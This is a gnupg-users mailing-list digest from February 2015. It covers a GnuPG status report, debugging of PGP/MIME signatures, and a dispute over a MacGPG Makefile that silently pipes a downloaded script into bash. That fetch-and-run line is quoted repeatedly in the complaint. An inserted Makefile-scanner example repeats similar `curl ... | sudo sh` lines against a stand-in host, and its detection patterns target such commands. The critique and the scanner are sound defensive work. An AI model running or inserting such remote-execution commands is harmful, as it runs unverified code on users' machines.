GnuPG News for January 2015
Hi!

Find below the plain text version of https://gnupg.org/blog/20150216-gnupg-in-january.html

Shalom-Salam,

   Werner

GnuPG News for January 2015

This is the first issue of a series of status reports for the GnuPG project. It is quite late for a review of things which happened in January but unexpected (but meanwhile widely known) events prohibited me from writing this earlier. More on this in another article.

First the good news: In January I was contacted by the [Core Infrastructure Initiative] with an offer to help funding the GnuPG development. I gladly accepted that offer for 60,000 USD for this year. After short and exceptionally non-bureaucratic negotiations we agreed on a contract which pays [g10^code] 5,000 USD each month in 2015 for work on GnuPG. That money will be used to pay my, now increased, salary. Thanks guys.

After the release of GnuPG 2.1.1 in late December quite some bugs were reported for this new branch. Thus most of my work was related to fixing these bugs and preparing a bug fix release. As usual Niibe Yutaka helped a lot by taking care of the smartcard part and reviewing other patches and bugs. Some minor bugs and memory leaks were fixed in that time as well as some code cleanup.

The move to automake 1.14 and gcc 4.9 required a bit of work. The update to the latest automake version was originally planned after the release of Debian Jessie but for other reasons I had to update my development box to to-be-Jessie already now and thus switching automake was done right away. This required only minor changes but with all those libraries required by GnuPG 2.x, it nevertheless took some days. At that opportunity all the build-aux files (config.guess et al.) were also updated to the latest version. The code base is now quite up to the latest development tools (at least in the repo). gcc 4.9 prints a couple of new warnings and thus a few other code changes were required as well.

I also took some days to play with the Windows port but finally decided that there won't be a Windows installer for the forthcoming 2.1.2 versions. We need to investigate how to best package the Windows binary version without having too many dependencies on external libraries. In particular GPGME with its dependencies on Glib is still troublesome and this might need some re-packaging of GPGME. The general idea for the 2.1 installer will be to package only the GnuPG core without any GUI stuff and do that in a way which helps other packages to use that one GnuPG version on Windows. This has the huge advantage that we can release updates to GnuPG without having also to update all the other software which uses GnuPG under the hood.

After having fixed a couple of build problems of OS X, Patrick Brunswick of Enigmail is meanwhile able to build an OS X installer soon after a new GnuPG release and thus a link to this installer has been added to the download page. To allow for a one-stop key generation we also came up with an easy way to generate a key without having to resort to Pinentry.

Even after 15 or so years of the `--command-fd' based API to gpg, the first request was filed to provide a stable interface to select the algorithm: gpg has always printed a list of algorithm sets and asked the user to enter the order number to select the algorithms. However, there was no way for a script to map algorithm names to these order numbers. It is surprising that it took so long until someone requested a solid way of entering that. It has been solved by assigning fixed strings (see doc/DETAILS) to each algorithm and allowing this string as an alternative to the order number.

Please do not hesitate to ask on gnupg-devel@ for advice or ask for a new feature. If a new feature makes sense and fits into the overall architecture then there is quite some chance that it will be added. But we need to know about it.

Like in many years, January closed at that great hackers meeting in Brussels. Maybe next year there will be enough interest for a GnuPG session and a booth at [FOSDEM].

[Core Infrastructure Initiative] http://www.linuxfoundation.org/programs/core-infrastructure-initiative
[g10^code] https://g10code.com
[FOSDEM] https://fosdem.org

--
Thoughts are free. Exceptions are regulated by a federal law.

___
Gnupg-users mailing list
Gnupg-users@gnupg.org
http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: MIME or inline signature ?
Hi, Christopher,

On 16.02.2015 at 13:01, Christopher Beck wrote:

Hi, now I'll use the inline format. If you can now verify my signature, this still could be the same bug (or whatever it is...). Ah sorry, the previous mail still was MIME. Now it's inline.

The signature of this (inline) message was automatically marked as correct by Enigmail, whereas the PGP/MIME tend to give a failure, at least, that's what it looks like at first glance. I will check my Enigmail settings, maybe there's something wrong with them.

Thanks

Stephan
Re: SSH generic socket forwarding for gpg-agent
On Mon 2015-02-16 05:12:08 -0500, Werner Koch wrote: On Mon, 16 Feb 2015 06:08, d...@fifthhorseman.net said: My suggestion is to do prompting, but not to require the full passphrase for each use. Okay, that is then similar to the confirm flag for the sshcontrol. yes, exactly. --dkg
Re: MIME or inline signature ?
On 16.02.2015 at 00:01, Damien Goutte-Gattat wrote:

What's wrong with what I am doing?

You provide GnuPG with only the *signature*. You need to also give it the *signed data* (the message) so that it can perform the verification. If you want to do that manually (something you don’t usually do with PGP/MIME signatures, since it’s quite cumbersome): In addition to what you have already done (saving the signature itself in “signature.asc”), you must also extract the MIME part that was signed.

Thanks, Damien, now my GPG (stand-alone) has verified the signature, telling me BAD signature. I don't know why, but I do not worry (too much).

Stephan
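Damien's point about needing the signed MIME part as well as the signature, as an added example (not code from the thread or from GnuPG): the signed data of a PGP/MIME mail is the first body part with its own MIME headers, CRLF line endings, and without the CRLF that precedes the boundary line, so one changed byte is enough for a BAD signature. The function name, output file names and the sample message are assumptions constructed for illustration.

```python
"""Split a PGP/MIME (multipart/signed) mail into the exact signed bytes and
the detached signature, ready for: gpg --verify signature.asc signed-part.bin"""
from __future__ import annotations

import email
import re
import sys


def split_pgp_mime(raw: bytes) -> tuple[bytes, bytes]:
    # Mail saved to disk often has bare LF; the signed form uses CRLF.
    raw = re.sub(rb"\r?\n", b"\r\n", raw)

    # The stdlib parser is used for the top-level headers only; the parts
    # themselves are cut out of the raw bytes so that nothing is re-encoded.
    msg = email.message_from_bytes(raw)
    if msg.get_content_type() != "multipart/signed":
        raise ValueError("not a multipart/signed message")
    if str(msg.get_param("protocol", "")).lower() != "application/pgp-signature":
        raise ValueError("multipart/signed, but not an OpenPGP signature")
    boundary = msg.get_boundary()
    if not boundary:
        raise ValueError("no boundary parameter")

    _, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("message has no body")

    # The CRLF in front of "--boundary" belongs to the delimiter, not to the
    # part before it, which is why it is consumed by the split pattern.
    delim = re.compile(
        rb"\r\n--" + re.escape(boundary.encode("ascii")) + rb"(?:--)?[ \t]*(?=\r\n|\Z)"
    )
    chunks = delim.split(b"\r\n" + body)
    if len(chunks) != 4:  # preamble, signed part, signature part, epilogue
        raise ValueError("expected exactly two body parts")

    signed = chunks[1][2:]  # drop the CRLF that ends the delimiter line
    _, sep, signature = chunks[2][2:].partition(b"\r\n\r\n")
    if not sep or b"BEGIN PGP SIGNATURE" not in signature:
        raise ValueError("second part carries no armored signature")
    return signed, signature.strip() + b"\r\n"


# Constructed sample with LF line endings; the signature block is a placeholder.
SAMPLE = b"\n".join([
    b"From: alice@example.org",
    b"To: bob@example.org",
    b"Subject: test",
    b"MIME-Version: 1.0",
    b"Content-Type: multipart/signed; micalg=pgp-sha512;",
    b' protocol="application/pgp-signature"; boundary="b1"',
    b"",
    b"This is an OpenPGP/MIME signed message.",
    b"--b1",
    b"Content-Type: text/plain; charset=utf-8",
    b"",
    b"Hello Bob,",
    b"this text is signed.",
    b"",
    b"--b1",
    b'Content-Type: application/pgp-signature; name="signature.asc"',
    b"",
    b"-----BEGIN PGP SIGNATURE-----",
    b"",
    b"(constructed placeholder, not a real signature)",
    b"-----END PGP SIGNATURE-----",
    b"",
    b"--b1--",
    b"",
])

if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE
    signed_part, sig = split_pgp_mime(data)
    with open("signed-part.bin", "wb") as fh:
        fh.write(signed_part)
    with open("signature.asc", "wb") as fh:
        fh.write(sig)
    print("wrote %d signed bytes; now run:" % len(signed_part))
    print("  gpg --verify signature.asc signed-part.bin")
```
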
Re: MIME or inline signature ?
On 16.02.2015 at 13:53, Philip Jackson wrote:

[...] What's wrong with what I am doing?

With the expression you used, (gpg --verify signature.asc), gpg will look for a similarly named data file in the same directory where you saved signature.asc. Is that data file (the signed email) present there or is it still in your email client? Since gpg replies that 'no valid OpenPGP data found' it would seem that you saved the signature.asc file in some convenient place completely removed from the email concerned and gpg couldn't make the connection. In any case, the Beckus signed emails do check fine with good signature in my thunderbird/enigmail client.

Thanks, Philip, I already replied to Damien's message, but, indeed, I forgot to copy the text into the same directory.

Stephan
Re: gpg-agent does not authenticate ssh connections
According to the error message gpg-agent is unable to sign using the card:

    ssh user@server
    Agent admitted failure to sign using the key.
    Permission denied (publickey,keyboard-interactive).

I had a look on the card with pkcs15-tool (removed irrelevant parts):

    PKCS#15 Card [OpenPGP Card]:
        Version: 0
        Serial number : XXX
        Manufacturer ID: OpenPGP project
        Language : de
        Flags : PRN generation, EID compliant

    PIN [Signature PIN]
        Object Flags : [0x3], private, modifiable
        ID : 01
        Flags : [0x13], case-sensitive, local, initialized
        Length : min_len:0, max_len:32, stored_len:32
        Pad char : 0x00
        Reference : 1
        Type : ascii-numeric
        Path : 3f00
        Tries left : 3

    PIN [Encryption PIN]
        Object Flags : [0x3], private, modifiable
        ID : 02
        Flags : [0x13], case-sensitive, local, initialized
        Length : min_len:0, max_len:32, stored_len:32
        Pad char : 0x00
        Reference : 2
        Type : ascii-numeric
        Path : 3f00
        Tries left : 0

    Private RSA Key [Authentication key]
        Object Flags : [0x3], private, modifiable
        Usage : [0x200], nonRepudiation
        Access Flags : [0x1D], sensitive, alwaysSensitive, neverExtract, local
        ModLength : 1024
        Key ref: 2 (0x2)
        Native : yes
        Auth ID: 02
        ID : 03

For me it looks like the authentication private key uses the encryption pin (Auth ID 0x02) while it should use the signature pin. I tried to set the encryption pin via

    pkcs15-tool --auth-id 02 --change-pin

but this did not work:

    PIN code change failed: Data object not found.

It seems the encryption pin is not supported by gnupg. Is there any way to change the authentication key to use the signature pin? On my Gnupg card only the authentication key is present, all other keys are currently empty. May this happen due to the empty slots and may be fixed when I add an encryption key to the card?
Re: moving up from 2.0.26 to 2.1.1
I passed an interesting Sunday afternoon : removed gnupg2.0.26 and attempted to replace it with gnupg-2.1.2. The experience was not entirely successful.

I got the updated libraries installed using configure/make/checkinstall. I used checkinstall because various howto articles on ubuntu's wiki recommend it and deprecate the older 'make install'. Checkinstall offered the advantage (or so it seemed to me) of producing a deb package which when installed could be easily identified by the package management system - all the easier to remove it later if needed. Sure enough, for the libraries involved, Synaptic Package Manager recognizes these packages installed in the /usr/local/... region of the file system.

However, when it came to using checkinstall on the gnupg-2.1.2 build, the deb package installed itself OVER the distro's gnupg-1.4.16. So the end result was a gain of 2.1.2 together with a loss of 1.4.16. Eventually, after re-installing 1.4.16 for a third time, and going back to 'make install', I got 2.1.2 installed without losing 1.4.16.

2.1.2 started up and looked good until I tried to do something with it and then it could not get gpg-agent running :

    gpg-agent: error while loading shared libraries: libnpth.so.0: cannot open shared object file: No such file or directory

libnpth.so.0 is certainly present in /usr/local/lib/.

Then I ran out of time - put the distro standard version back into service and went back to life (until next time).

Philip
Please remove MacGPG from gnupg.org due to serious security concerns
Hi!

I hereby request that MacGPG gets removed from gnupg.org due to serious security concerns.

Basically, the first thing the Makefile in all their repos / tarballs does is this:

    @bash -c $$(curl -fsSL https://raw.github.com/GPGTools/GPGTools_Core/master/newBuildSystem/prepare-core.sh)

So you type make not expecting anything bad (you verified the checksum and everything), but you just executed remote code. Great. And they even hide it from you by prefixing it with @, which is downright evil. So you never notice unless you look at the Makefile.

Currently, that script clones another common repo using the unverified git:// protocol (because, why use submodules if you can do it in an insecure way?), but obviously, that can change any minute and could change just for certain IPs etc.

The developer(s) don't allow any issues on GitHub, so I tried contacting them by other means (e.g. Twitter), only to get ignored. They clearly don't care about security. In any case, somebody who does something like this clearly doesn't care about security the least. The potential for backdoors is extremely high and I think nobody should be using any software written by this developer / these developer(s), as they clearly demonstrated that they couldn't care less about your security.

I don't feel comfortable that the majority of Mac users are using this software which doesn't care for security at all, but is used for extremely security sensitive tasks. I guess this is because gnupg.org recommends it and therefore people think it's safe. I think gnupg.org should do the contrary instead and strongly discourage using it.

-- Jonathan
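A check a packager or reviewer can run over an unpacked tarball before typing make, as an added example (not code from the thread or from any project named in it): it flags Makefile lines that fetch content and hand it to a shell, records whether the recipe is silenced with @, and also reports git:// URLs. The rule set, names and the sample Makefile are assumptions constructed for illustration, and it goes beyond the one line quoted above by covering pipe-to-shell and $(shell ...) forms.

```python
"""Flag Makefile lines that download something and execute it at build time."""
from __future__ import annotations

import re
import sys
from dataclasses import dataclass

SHELL = r"(?:ba|da|k|z)?sh"
FETCH = r"(?:curl|wget)"
RULES = [
    # sh -c "$(curl ...)", eval "$(wget ...)", and the backtick forms
    ("remote-exec", re.compile(rf"\b(?:{SHELL}\s+-c|eval)\s+[\"']?(?:\$\(|`)\s*{FETCH}\b")),
    # curl ... | sh, wget -O- ... | sudo bash
    ("remote-exec", re.compile(rf"\b{FETCH}\b[^|]*\|\s*(?:sudo\s+)?{SHELL}\b")),
    # git:// has no transport authentication or integrity protection
    ("plain-git", re.compile(r"\bgit://\S+")),
]


@dataclass
class Finding:
    line: int       # first physical line of the (possibly continued) command
    kind: str       # "remote-exec" or "plain-git"
    silenced: bool  # True when make would not echo the command
    command: str


def logical_lines(text: str):
    """Yield (line_no, text) with backslash-continued lines joined."""
    buf, start = "", 0
    for no, line in enumerate(text.splitlines(), 1):
        if not buf:
            start = no
        if line.endswith("\\"):
            buf += line[:-1] + " "
            continue
        yield start, buf + line
        buf = ""
    if buf:
        yield start, buf


def scan_makefile(text: str) -> list[Finding]:
    findings = []
    for no, line in logical_lines(text):
        if line.startswith("\t"):
            # Recipe line: '@', '-' and '+' prefixes may precede the command.
            prefix = re.match(r"[\s@+-]*", line).group()
            silenced, cmd = "@" in prefix, line[len(prefix):]
        elif "$(shell" in line:
            # Runs while make parses the file (even under make -n), never echoed.
            silenced, cmd = True, line
        else:
            continue
        shell_text = cmd.replace("$$", "$")  # make passes $$ to the shell as $
        for kind, rule in RULES:
            if rule.search(shell_text):
                findings.append(Finding(no, kind, silenced, cmd.strip()))
    return findings


# Constructed sample; example.invalid stands in for any remote host.
SAMPLE = (
    "all: prepare\n"
    "\t$(CC) -o tool main.c\n"
    "\n"
    "prepare:\n"
    "\t@bash -c \"$$(curl -fsSL https://example.invalid/prepare-core.sh)\"\n"
    "\tgit clone git://example.invalid/common.git deps/common\n"
    "\tcurl -fsSLO https://example.invalid/src.tar.gz\n"
    "\n"
    "install:\n"
    "\tcurl -fsSL https://example.invalid/install.sh \\\n"
    "\t\t| sudo sh\n"
)

if __name__ == "__main__":
    source = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE
    for f in scan_makefile(source):
        note = " (hidden with @)" if f.silenced else ""
        print(f"line {f.line}: {f.kind}{note}: {f.command}")
```

A plain download such as the `curl -fsSLO` line is not reported; only fetched content that reaches a shell, or a git:// URL, is.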
Re: Please remove MacGPG from gnupg.org due to serious security concerns
I'm guessing because you need an SSH key at GitHub in order to pull via SSH. Yet another problem solved by git modules. Still, they could have at least changed it to https.

GitHub supports pull/push via SSH or HTTPS therefore you can do this too with MacGPG (2) or any GitHub repo.

However, I'd recommend that you go over the proper support channels first (rather than merely twitter) before asking that references to the project are deleted.

There must be lots of MacGPG users and most of them probably use the GPG suite, because it is GUI based (also more user friendly, unlike GnuPG) and it would not be fair on them to unilaterally remove the link to GnuPG or to receive some kind of security warning without raising the issues you mention with the people who are actively developing and maintaining the source.

Sandeep
Re: Please remove MacGPG from gnupg.org due to serious security concerns
Hi

I think this is an exaggeration. I have been using MacGPG and the GPG Tools support forum for quite some time, and have brought a number of issues to their attention, including a couple of security related ones, like making their key fingerprints more visible. They do care about security and are very responsive to posts on the GPG Tools support forum http://support.gpgtools.org/

The GitHub issues page for MacGPG is not the main place where issues are raised, it’s actually the support forum, where there are lots of other resources as well.

Sandeep Murthy s.mur...@mykolab.com

On 16 Feb 2015, at 21:48, Jonathan Schleifer js-gnupg-us...@webkeks.org wrote:

Hi!

I hereby request that MacGPG gets removed from gnupg.org due to serious security concerns.

Basically, the first thing the Makefile in all their repos / tarballs does is this:

    @bash -c $$(curl -fsSL https://raw.github.com/GPGTools/GPGTools_Core/master/newBuildSystem/prepare-core.sh)

So you type make not expecting anything bad (you verified the checksum and everything), but you just executed remote code. Great. And they even hide it from you by prefixing it with @, which is downright evil. So you never notice unless you look at the Makefile.

Currently, that script clones another common repo using the unverified git:// protocol (because, why use submodules if you can do it in an insecure way?), but obviously, that can change any minute and could change just for certain IPs etc.

The developer(s) don't allow any issues on GitHub, so I tried contacting them by other means (e.g. Twitter), only to get ignored. They clearly don't care about security. In any case, somebody who does something like this clearly doesn't care about security the least. The potential for backdoors is extremely high and I think nobody should be using any software written by this developer / these developer(s), as they clearly demonstrated that they couldn't care less about your security.

I don't feel comfortable that the majority of Mac users are using this software which doesn't care for security at all, but is used for extremely security sensitive tasks. I guess this is because gnupg.org recommends it and therefore people think it's safe. I think gnupg.org should do the contrary instead and strongly discourage using it.

-- Jonathan
Re: Please remove MacGPG from gnupg.org due to serious security concerns
On 2015-02-16 22:48, Jonathan Schleifer wrote:

Hi!

I hereby request that MacGPG gets removed from gnupg.org due to serious security concerns.

Basically, the first thing the Makefile in all their repos / tarballs does is this:

    @bash -c $$(curl -fsSL https://raw.github.com/GPGTools/GPGTools_Core/master/newBuildSystem/prepare-core.sh)

So you type make not expecting anything bad (you verified the checksum and everything), but you just executed remote code. Great. And they even hide it from you by prefixing it with @, which is downright evil. So you never notice unless you look at the Makefile.

Currently, that script clones another common repo using the unverified git:// protocol (because, why use submodules if you can do it in an insecure way?), but obviously, that can change any minute and could change just for certain IPs etc.

The developer(s) don't allow any issues on GitHub, so I tried contacting them by other means (e.g. Twitter), only to get ignored. They clearly don't care about security. In any case, somebody who does something like this clearly doesn't care about security the least. The potential for backdoors is extremely high and I think nobody should be using any software written by this developer / these developer(s), as they clearly demonstrated that they couldn't care less about your security.

I don't feel comfortable that the majority of Mac users are using this software which doesn't care for security at all, but is used for extremely security sensitive tasks. I guess this is because gnupg.org recommends it and therefore people think it's safe. I think gnupg.org should do the contrary instead and strongly discourage using it.

-- Jonathan

It is true that there's a pretty big security hole there with git clone git://github.com..., since any malicious attacker can intercept that communication. There's no checksumming or anything to make this difficult *at all*.

What *does* surprise me is that there's a commit to specifically remove git+ssh in favour of insecure ssh. There's no comment on why that was done either: https://github.com/GPGTools/GPGTools_Core/commit/5186bade36acedfdc0b76f9f5ddfcfc004ec698b

However, I'd recommend that you go over the proper support channels first (rather than merely twitter) before asking that references to the project are deleted. As stated on https://gpgtools.org/: Please report any issues you find on our support platform. Which points to http://support.gpgtools.org/.

Cheers,

-- Hugo Osvaldo Barrera

A: Because we read from top to bottom, left to right.
Q: Why should I start my reply below the quoted text?
Re: Please remove MacGPG from gnupg.org due to serious security concerns
On 17.02.2015 at 00:53, Hugo Osvaldo Barrera h...@barrera.io wrote:

It is true that there's a pretty big security hole there with git clone git://github.com..., since any malicious attacker can intercept that communication. There's no checksumming or anything to make this difficult *at all*.

Well, this is only checking out the code. While I agree that this is dangerous, the curl | sh paradigm is even more dangerous.

What *does* surprise me is that there's a commit to specifically remove git+ssh in favour of insecure ssh. There's no comment on why that was done either: https://github.com/GPGTools/GPGTools_Core/commit/5186bade36acedfdc0b76f9f5ddfcfc004ec698b

I'm guessing because you need an SSH key at GitHub in order to pull via SSH. Yet another problem solved by git modules. Still, they could have at least changed it to https.

However, I'd recommend that you go over the proper support channels first (rather than merely twitter) before asking that references to the project are deleted. As stated on https://gpgtools.org/: Please report any issues you find on our support platform. Which points to http://support.gpgtools.org/.

Well, I think there's enough evidence that they do not know how to do things securely. It has even been pointed out in this thread that this is not the first time there are serious security problems. It feels like they are actively trying to make it insecure, because they do things that normally nobody working on a security product would even consider.

Please consider this: GnuPG is a security product. People's lives might depend on it. They might have heard that GnuPG is secure and think they are safe since even Snowden uses it. They go to gnupg.org and then download MacGPG. That's dangerous and there's no way for them to know unless they go check the source.

As a matter of fact, I compromised one of my machines by checking out one of the MacGPG tools, checking the checksum of the downloaded tarball and then typing make. I did not realize it executed remote code (twice even, the curl and the git checkout, on which make is also run later on). They even actively hide the fact, which makes it even worse.

Should gnupg.org really endorse that?

-- Jonathan
Re: Please remove MacGPG from gnupg.org due to serious security concerns
On 17.02.2015 at 00:16, Sandeep Murthy s.mur...@mykolab.com wrote:

I think this is an exaggeration. I have been using MacGPG and the GPG Tools support forum for quite some time, and have brought a number of issues to their attention, including a couple of security related ones, like making their key fingerprints more visible.

On the one hand, you think it's an exaggeration, on the other, you can list even more examples. I mean, they don't even do the most basic security practices which are common in basically all projects these days, even non-security related projects. And we're talking about a security related project here! If someone clearly demonstrates even lack of the most basic security measures, why should that someone be trusted with way more complex stuff? You listing they had problems in the past basically only strengthens the argument that they are not to be trusted and should not be endorsed.

They do care about security and are very responsive to posts on the GPG Tools support forum

Really? Somebody caring about security executing remote code? Rather than using git submodules (which exist for how many years?), they prefer executing remote code that then downloads more code using an unverified channel. This can't be just laziness (using git submodules is less work), but looks like somebody even put a lot of effort into failing at security. How can you call that caring about security? If you'd argue they care a lot about being insecure, I'd agree though, because they actually seem to put a lot of effort into that…

http://support.gpgtools.org/

If you are a security project, you should be thankful for people reporting bugs, not trying to make it as hard as possible to report a serious bug. This looks like more of a users help users forum kind of thing, nothing where you would want to report a bug.

-- Jonathan
2.1.2: keyserver route failure
Is there any explanation for this behavior, or is this a 2.1.2 bug? (This is using Patrick's OS X package, if that matters. It also affects all keyservers I tested, not just the round-robin front-end.)

    quorra:~ rjh$ gpg - --keyserver x-hkp://pool.sks-keyservers.net --recv-key 0xD6B98E10
    gpg: using character set 'utf-8'
    gpg: keyserver receive failed: No route to host
    quorra:~ rjh$ ping pool.sks-keyservers.net
    PING pool.sks-keyservers.net (140.211.169.202): 56 data bytes
    64 bytes from 140.211.169.202: icmp_seq=0 ttl=55 time=102.879 ms
Fwd: Please remove MacGPG from gnupg.org due to serious security concerns
If you have concerns or suggestions then the best thing would be to contact Luke Le, Steve or the other support staff on http://support.gpgtools.org/

Sandeep Murthy s.mur...@mykolab.com

Begin forwarded message:

Subject: Re: Please remove MacGPG from gnupg.org due to serious security concerns
From: Sandeep Murthy s.mur...@mykolab.com
Date: 16 February 2015 23:16:06 GMT
Cc: js-gnupg-us...@webkeks.org
To: gnupg-users@gnupg.org

Hi

I think this is an exaggeration. I have been using MacGPG and the GPG Tools support forum for quite some time, and have brought a number of issues to their attention, including a couple of security related ones, like making their key fingerprints more visible. They do care about security and are very responsive to posts on the GPG Tools support forum http://support.gpgtools.org/

The GitHub issues page for MacGPG is not the main place where issues are raised, it’s actually the support forum, where there are lots of other resources as well.

Sandeep Murthy s.mur...@mykolab.com

On 16 Feb 2015, at 21:48, Jonathan Schleifer js-gnupg-us...@webkeks.org wrote:

Hi!

I hereby request that MacGPG gets removed from gnupg.org due to serious security concerns.

Basically, the first thing the Makefile in all their repos / tarballs does is this:

    @bash -c $$(curl -fsSL https://raw.github.com/GPGTools/GPGTools_Core/master/newBuildSystem/prepare-core.sh)

So you type make not expecting anything bad (you verified the checksum and everything), but you just executed remote code. Great. And they even hide it from you by prefixing it with @, which is downright evil. So you never notice unless you look at the Makefile.

Currently, that script clones another common repo using the unverified git:// protocol (because, why use submodules if you can do it in an insecure way?), but obviously, that can change any minute and could change just for certain IPs etc.

The developer(s) don't allow any issues on GitHub, so I tried contacting them by other means (e.g. Twitter), only to get ignored. They clearly don't care about security. In any case, somebody who does something like this clearly doesn't care about security the least. The potential for backdoors is extremely high and I think nobody should be using any software written by this developer / these developer(s), as they clearly demonstrated that they couldn't care less about your security.

I don't feel comfortable that the majority of Mac users are using this software which doesn't care for security at all, but is used for extremely security sensitive tasks. I guess this is because gnupg.org recommends it and therefore people think it's safe. I think gnupg.org should do the contrary instead and strongly discourage using it.

-- Jonathan
Re: MIME or inline signature ?
On Monday 16 February 2015 at 5:38:08 AM, in mid:m0lhjy8lhb@kcals.intra.maillard.im, Xavier Maillard wrote:

One more argument in favor of the inline: it questions my fellows; what are these cabalistic characters and then you can what's the purpose of all of this.

I like that advantage of keeping it all visible in the message body. But don't recall ever having been asked the question.

-- Best regards

MFPA mailto:2014-667rhzu3dc-lists-gro...@riseup.net

Man is not a rational animal, he is a rationalising animal.
Re: MIME or inline signature ?
On 15/02/15 22:42, Stephan Beck wrote:

Hi, Christopher,

On 15.02.2015 at 20:14, Christopher Beck wrote: On Sunday 15 February 2015 16:30:33 Stephan Beck wrote: On 15.02.2015 at 12:26, Ludwig Hügelschäfer wrote: On 14.02.15 23:05, Stephan Beck wrote:

Sometimes my signatures are being counted as bad ones. But I figured out it is a bug on kmail or enigmail (there were bug reports on both implementations). Well, I'm just about to figure it out, so there may be another issue instead of them both. According to the question in the topic: inline signatures always worked, MIME didn't. I still wonder why, and after my next exams I'll investigate on that...

Beckus

I try to be extremely clear. I cannot verify your signature, neither with Enigmail nor using gpg stand-alone. My version is 1.4.12

Steps to reproduce the event:

1) I import your key using your key-ID from within gpg 1.4.12 typing gpg --recv-keys [your key id], result: gpg has imported your key, everything's all right here.
2) I open the header of your message.
3) I copy the signature and save it as a beckus_sig.asc file using a simple text editor (or, optionally, as signature.asc)
4) I type gpg --verify beckus_sig.asc (or signature.asc)
5) gpg outputs: No valid OpenPGP data found. Signature verification failed. (I am retranslating that into English, so please be kind with any imprecision you may find).

What's wrong with what I am doing?

With the expression you used, (gpg --verify signature.asc), gpg will look for a similarly named data file in the same directory where you saved signature.asc. Is that data file (the signed email) present there or is it still in your email client? Since gpg replies that 'no valid OpenPGP data found' it would seem that you saved the signature.asc file in some convenient place completely removed from the email concerned and gpg couldn't make the connection. In any case, the Beckus signed emails do check fine with good signature in my thunderbird/enigmail client.

Philip
Re: SSH generic socket forwarding for gpg-agent
On Mon 2015-02-16 02:50:15 -0500, Doug Barton wrote: On 2/15/15 11:41 PM, Daniel Kahn Gillmor wrote:

In situations where you want to make sure that you know (and approve of) the use of the agent by the remote machine, you'd like a prompt to appear within your (local, trusted) environment.

agent forwarding is off by default, and has to be enabled either on the command line, or in a config file. Why is further user interaction on this point necessary/desirable?

Because saying "i want to forward my agent to remote system X so that i can sign a couple of specific messages on that host" is different than saying "i want to forward my agent to remote system X so that X can make as many uses of my agent's secret key material as can be pushed down the network pipe".

We're now explicitly enabling people to forward the agent (e.g. --extra-socket in gpg-agent(1)); we should be providing appropriate usage controls to accompany that functionality.

--dkg
Re: [Announce] GnuPG 2.1.2 released
On Friday 13 February 2015 at 20:23:26, Werner Koch wrote:

This was meant to read GnuPG-2.1.2 I guess, because of

No, this describes what is new in the 2.1 branch. 2.1.2 is basically a bug fix release.

Just wanted to point out that the release announcement left me confused at a few points. If it confused me (as a long time GnuPG User/Contributor) I assume it will confuse many others as well.

To restate, I was confused about

* What the items in section What's New in GnuPG-2.1 actually meant, it were the differences 2.1.1 to 2.1.2 as I could figure out, but this wasn't clear from the text.
* This version fixes a lot of bugs found after the release of 2.1.0 which probably should have been 2.1.1.

Overall I believe the announcement has too much text that stays the same for each release. It would benefit from being focussed on the key differences and let the rest be a standard doc part.

Best,
Bernhard

ps.: Congrats on the taz article (in German) I've added the link to the wiki.

--
www.intevation.de/~bernhard (CEO)    www.fsfe.org (Founding GA Member)
Intevation GmbH, Osnabrück, Germany; Amtsgericht Osnabrück, HRB 18998
Owned and run by Frank Koormann, Bernhard Reiter, Dr. Jan-Oliver Wagner
Re: SSH generic socket forwarding for gpg-agent
On Mon, 16 Feb 2015 06:08, d...@fifthhorseman.net said:

My suggestion is to do prompting, but not to require the full passphrase for each use.

Okay, that is then similar to the confirm flag for the sshcontrol.

Salam-Shalom,

Werner

--
Thoughts are free. Exceptions are regulated by a federal law.
Re: MIME or inline signature ?
On Sun, 15 Feb 2015 19:56:21 -0800, Doug Barton stated:

I get that you have a preference, and personally I don't care how you sign your messages. But as I stated before, it really bothers me when the zealots (on either side) misrepresent the facts in order to bolster their case.

I agree Doug, and I think this debate has gone on long enough. We are each free to use whatever method we feel most at ease with. Until an RFC is released definitively declaring one type obsolete, who really cares.

--
Jerry

That guy's gotta stop... He'll see us.
Said to friend Rolf Wütherich in 1955 after being advised to slow his driving speed, moments before a head-on collision took his life.
Re: MIME or inline signature ?
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Monday 16 February 2015 12:32:49 Christopher Beck wrote:

On Sunday 15 February 2015 22:42:09 Stephan Beck wrote:

Hi, Christopher,

On 15.02.2015 at 20:14, Christopher Beck wrote:

On Sunday 15 February 2015 16:30:33 Stephan Beck wrote:

On 15.02.2015 at 12:26, Ludwig Hügelschäfer wrote:

On 14.02.15 23:05, Stephan Beck wrote:

Sometimes my signatures are being counted as bad ones. But I figured out it is a bug on kmail or enigmail (there were bug reports on both implementations). Well, I'm just about to figure it out, so there may be another issue instead of them both. According to the question in the topic: inline signatures always worked, MIME didn't. I still wonder why, and after my next exams I'll investigate on that...

Beckus

I try to be extremely clear. I cannot verify your signature, neither with Enigmail nor using gpg stand-alone. My version is 1.4.12.

Steps to reproduce the event:

1) I import your key using your key-ID from within gpg 1.4.12 typing gpg --recv-keys [your key id], result: gpg has imported your key, everything's all right here.
2) I open the header of your message.
3) I copy the signature and save it as a beckus_sig.asc file using a simple text editor (or, optionally, as signature.asc)
4) I type gpg --verify beckus_sig.asc (or signature.asc)
5) gpg outputs: No valid OpenPGP data found. Signature verification failed.

(I am retranslating that into English, so please be kind with any imprecision you may find).

What's wrong with what I am doing?

Stephan

Hi, now I'll use the inline format. If you can now verify my signature, this still could be the same bug (or whatever it is...).

Ah sorry, the previous mail still was MIME. Now it's inline.

- --
I use GnuPG (GPG) for E-Mail encryption and signing. If you want some privacy, my public key ID is 2F9D4F14. The file signature.asc this message includes contains a cryptographic signature which enables you to verify this E-Mail really was written by me.

Christopher Beck
Gerhart-Hauptmann-Str. 1
91058 Erlangen
Tel.: 09131 / 9245437
Fax.: 09131 / 8148708
Jabber: bec...@jabber.org
EPVPN: (+49 221 59619) - 5232
Re: MIME or inline signature ?
On Sunday 15 February 2015 22:42:09 Stephan Beck wrote:

Hi, Christopher,

On 15.02.2015 at 20:14, Christopher Beck wrote:

On Sunday 15 February 2015 16:30:33 Stephan Beck wrote:

On 15.02.2015 at 12:26, Ludwig Hügelschäfer wrote:

On 14.02.15 23:05, Stephan Beck wrote:

